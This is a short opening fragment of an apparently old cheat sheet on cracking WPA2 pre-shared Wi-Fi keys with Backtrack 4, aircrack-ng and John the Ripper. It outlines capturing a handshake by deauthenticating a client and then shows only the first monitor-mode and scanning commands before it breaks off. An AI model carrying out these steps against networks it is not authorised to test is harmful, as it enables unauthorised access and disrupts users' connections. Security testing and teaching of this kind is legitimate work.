Cracking WPA2 PSK With Backtrack 4, Aircrack-Ng and John The Ripper
Cracking WPA2 PSK With Backtrack 4, Aircrack-Ng and John The Ripper
Ripper
http://www.corelan.be:8800/index.php/2009/02/24/cheatsheet-cracking-wpa2-psk-wit
h-backtrack-4-aircrack-ng-and-john-the-ripper/
Basic steps :
• Put interface in monitor mode
• Find wireless network (protected with WPA2 and a Pre Shared Key)
• Capture all packets
• Wait until you see a client and deauthenticate the client, so the handshake can
be captured
• Crack the key using a dictionary file (or via John The Ripper)
I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In
backtrack4, this device is recognized as wlan0.
First, put the card in monitor mode :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57